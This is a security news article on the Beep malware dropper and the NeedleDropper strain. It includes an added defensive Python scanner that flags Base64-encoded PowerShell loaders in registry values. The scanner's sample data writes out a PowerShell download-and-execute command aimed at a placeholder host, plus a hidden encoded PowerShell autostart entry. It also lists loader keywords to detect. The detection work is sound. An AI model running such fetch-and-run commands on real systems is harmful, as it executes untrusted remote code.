
Experts Warn of 'Beep' – A New Evasive Malware That Can Fly Under the Radar

Feb 15, 2023 | Ravie Lakshmanan | Threat Detection / Malware

Cybersecurity researchers have unearthed a new piece of evasive malware dubbed Beep that’s designed to fly under the radar and drop additional payloads onto a compromised host.

“It seemed as if the authors of this malware were trying to implement as many anti-debugging and anti-VM (anti-sandbox) techniques as they could find,” Minerva Labs researcher Natalie Zargarov said.

“One such technique involved delaying execution through the use of the Beep API function, hence the malware’s name.”

Beep comprises three components, the first of which is a dropper that’s responsible for creating a new Windows Registry key and executing a Base64-encoded PowerShell script stored in it.

The PowerShell script, for its part, reaches out to a remote server to retrieve an injector, which, after confirming it’s not being debugged or launched in a virtual machine, extracts and launches the payload via a technique called process hollowing.
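The persistence pattern described above, a registry value holding a Base64-encoded PowerShell script, is one a defender can hunt for directly. The following is an added example written for this page, not code from the article or from Minerva Labs' analysis: it takes registry entries as (key, value name, data) triples, tries to decode any Base64 blob as UTF-16LE (the encoding `powershell -EncodedCommand` expects) and as UTF-8, and flags values that decode to script text containing common loader keywords. The key paths, value names and the sample script are constructed for the demonstration.

```python
import base64
import binascii
import re

# Keywords typical of PowerShell download-and-execute loaders. A hit is a lead
# for an analyst, not proof of compromise.
PS_INDICATORS = re.compile(
    r"(powershell|Invoke-Expression|\bIEX\b|DownloadString|DownloadFile|"
    r"Net\.WebClient|Invoke-WebRequest|FromBase64String|-enc\w*)",
    re.IGNORECASE,
)

# A value is worth decoding only if it is entirely Base64 alphabet and long
# enough that a real script could fit in it (short tokens are mostly config).
B64_RE = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")


def decode_candidate(data: str):
    """Return a list of (encoding, text) pairs for every readable decoding of a
    Base64 blob. Non-Base64 input and binary payloads yield an empty list."""
    blob = data.strip()
    if not B64_RE.match(blob):
        return []
    try:
        raw = base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return []
    results = []
    for enc in ("utf-16-le", "utf-8"):
        try:
            text = raw.decode(enc)  # strict: odd lengths / bad bytes raise
        except UnicodeDecodeError:
            continue
        # Keep only decodings that look like text (no NULs or control bytes).
        if all(ch.isprintable() or ch in "\r\n\t" for ch in text):
            results.append((enc, text))
    return results


def scan_entry(key: str, name: str, data: str):
    """Return a finding dict for a suspicious registry value, or None."""
    # 1. Plain-text PowerShell launch, e.g. from a Run key.
    if "powershell" in data.lower():
        return {"key": key, "value": name,
                "reason": "plaintext PowerShell command", "script": data}
    # 2. Base64 blobs: the whole value, or any token inside it.
    for token in data.split():
        for enc, text in decode_candidate(token):
            hit = PS_INDICATORS.search(text)
            if hit:
                return {"key": key, "value": name,
                        "reason": f"Base64 ({enc}) decodes to script containing '{hit.group(0)}'",
                        "script": text}
    return None


def scan_entries(entries):
    """Scan an iterable of (key, name, data) triples and return all findings."""
    return [f for f in (scan_entry(*e) for e in entries) if f]


# Constructed sample data (hypothetical keys, names and script; not from the article).
STAGE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/stage2')"

SAMPLE_ENTRIES = [
    # benign: ordinary autostart entry
    ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "OneDrive",
     "C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe /background"),
    # benign: short Base64 configuration value (below the length threshold)
    ("HKCU\\Software\\ExampleApp", "Theme",
     base64.b64encode(b"dark-mode-enabled").decode()),
    # benign: long Base64 value holding binary data, not text
    ("HKCU\\Software\\ExampleApp", "Cert",
     base64.b64encode(bytes(range(256))).decode()),
    # suspicious: script stashed in a custom key as UTF-16LE, then Base64
    ("HKCU\\Software\\ExampleVendor\\Cache", "Blob",
     base64.b64encode(STAGE_SCRIPT.encode("utf-16-le")).decode()),
    # suspicious: the same stash as UTF-8
    ("HKLM\\Software\\ExampleVendor\\Cache", "Blob2",
     base64.b64encode(STAGE_SCRIPT.encode("utf-8")).decode()),
    # suspicious: Run key launching PowerShell with an encoded command
    ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "Updater",
     "powershell.exe -nop -w hidden -enc "
     + base64.b64encode("Get-Date".encode("utf-16-le")).decode()),
]

if __name__ == "__main__":
    for finding in scan_entries(SAMPLE_ENTRIES):
        print(f"{finding['key']}\\{finding['value']}: {finding['reason']}")
        print("   ", finding["script"][:120])
```

On a live host the same triples can be produced by exporting the suspect hives (for example with `reg export`) and parsing the result, or by reading them through the `winreg` module; the decoding and matching logic does not change. The UTF-16LE attempt comes first because that is the encoding PowerShell's `-EncodedCommand` consumes, and a strict decode rejects odd-length or non-text data instead of producing false hits.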

The payload is an information stealer that’s equipped to collect and exfiltrate system information and enumerate running processes. Other instructions the malware is capable of accepting from a command-and-control (C2) server include the ability to execute DLL and EXE files.

A number of other features are yet to be implemented, suggesting that Beep is still in its early stages of development.

What sets the emerging malware apart is its heavy focus on stealth: it adopts a large number of detection evasion methods in an attempt to resist analysis, avoid sandboxes, and delay execution.

“Once this malware successfully penetrates a system, it can easily download and spread a wide range of additional malicious tools, including ransomware, making it extremely dangerous,” Zargarov noted.

The findings come as antivirus vendor Avast revealed details of another dropper strain codenamed NeedleDropper that has been used to distribute different malware families since October 2022.

Delivered via spam email attachments, Discord, or OneDrive URLs, the malware is suspected to be offered as a service for other criminal actors looking to distribute their own payloads.

“The malware tries to hide itself by dropping many unused, invalid files and stores important data between several MB of unimportant data, and also utilizes legitimate applications to perform its execution,” the company said.
